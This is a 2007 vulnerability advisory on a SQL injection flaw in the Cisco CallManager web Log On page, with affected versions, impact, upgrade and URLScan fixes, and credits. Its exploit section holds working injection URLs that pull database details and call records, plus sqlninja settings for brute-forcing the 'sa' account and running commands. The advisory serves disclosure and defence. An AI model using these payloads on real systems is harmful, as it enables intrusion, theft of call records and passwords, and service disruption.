cisco-sql.txt

`SUMMARY  
=======  
  
A SQL injection vulnerability exists in the Log On page of the web  
interface for Cisco CallManager AKA Unified Communications Manager. An  
unauthenticated attacker who is able to access the Log On page could  
exploit this vulnerability to run arbitrary SQL commands as the logged  
in database user, usually cm_publisher. By running SQL commands, the  
attacker could gain information about the CallManager configuration,  
including call records.  
  
AFFECTED SOFTWARE  
=================  
  
* Cisco CallManager prior to v3.3(5)sr2b  
* Cisco CallManager prior to v4.1(3)sr5  
* Cisco CallManager prior to v4.2(3)sr2  
* Cisco CallManager prior to v4.3(1)sr1  
  
Note that I have not personally tested these products - I am simply  
reproducing Cisco's information on the issue.  
  
IMPACT  
======  
  
An attacker who is able to access the Log On page could harvest a large  
amount of data about the Cisco VOIP environment - 260 tables in two  
databases. Depending on the target system's configuration, this data  
may include sensitive information such as passwords  
(ccm0306..PilotUser.Password, ccm0306..syspublications.ftp_password,  
ccm0306..sysusers.password) and call records (cdr..CallDetailRecord.*).  
  
The default database user does not appear to have sufficient privileges  
to perform operations more destructive than simple SELECT statements -  
no INSERT, UPDATE, DELETE, DROP, etc.  
  
It may be possible to use attacks against the exposed MS SQL database  
in order to expand the impact of this vulnerability - see Advanced  
Exploitation, below.  
  
DETAILS  
=======  
  
The log on page of the Cisco Unified CallManager web interface performs  
insufficient checking of the "lang" HTTP GET variable before passing it  
into a SQL query. By providing a specially crafted lang variable, an  
attacker could trick the backend MS SQL server into executing arbitrary  
SQL queries as the logged in user.  
  
The affected query returns only a single value, and that value is  
placed in a Javascript include URL which is not visible in the rendered  
HTML page. As a result, practical exploitation of this vulnerability  
can be difficult. Security professionals wishing to test the  
vulnerability against their own systems may wish to write wrapper code  
to make running repeated queries less tedious.  
  
SOLUTION  
========  
  
- Upgrade to an unaffected version of Cisco CallManager  
  
- Enable the URLScan ISAPI filter. This filter ships with CCM and  
restricts the maximum length of form fields, making this vulnerability  
difficult or impossible to exploit.  
  
  
EXPLOIT  
=======  
  
To see the returned data from these exploit URLs, view the source of  
the returned page and look for a line like this:  
  
<SCRIPT language="javascript" src="locales/123/userwebdictionary.js"></SCRIPT>  
  
The string "123" is the value returned from the database.  
  
Examples:  
  
Display the logged-in database user.  
  
https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='  
  
Display the selected database.  
  
https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='  
  
Display the UNIX time at which a call was made from extension 12345.  
  
https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='  
  
Display the destination number for that call. Replace "1174900000" with  
the value from the previous query.  
  
https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='  
  
ADVANCED EXPLOITATION  
=====================  
  
Several free tools exist to automate attacking SQL injection  
vulnerabilities like this one. Depending on the configuration of the  
target server, it may be possible to escalate database privileges or  
run arbitrary system commands.  
  
For example, icesurfer's excellent sqlninja tool (>= 0.1.3) can be used  
to detemine various information about the server hosting the  
CallManager install, launch a brute-force attack against the database  
"sa" account password, and run arbitrary commands on the server if the  
"sa" attack succeeds.  
  
http://sqlninja.sourceforge.net/  
  
The following parameters should be specified in the sqlninja.conf file:  
  
page = /ccmuser/logon.asp  
stringstart = lang=en';  
stringend = select tkUserLocale from UserLocaleBrowserLanguageMap M where ''='  
appendcomment = no  
  
In at least one instance, an unsuccessful brute-force attack against  
the "sa" password led to denial-of-service conditions on the  
CallManager server.  
  
CREDITS  
=======  
  
Brandeis University worked with Cisco to release this information in a  
responsible manner. Cisco has released a Security Advisory on this  
issue at:  
  
http://www.cisco.com/warp/public/707/cisco-sa-20070829-ccm.shtml  
  
I would also like to thank icesurfer for his work modifying sqlninja to  
work with this exploit.  
  
REVISION HISTORY  
================  
  
2007-08-30 original release  
  
--   
Elliot Kendall <[email protected]>  
Network Security Architect  
Brandeis University  
  
Trouble replying? See http://people.brandeis.edu/~ekendall/sign/  
`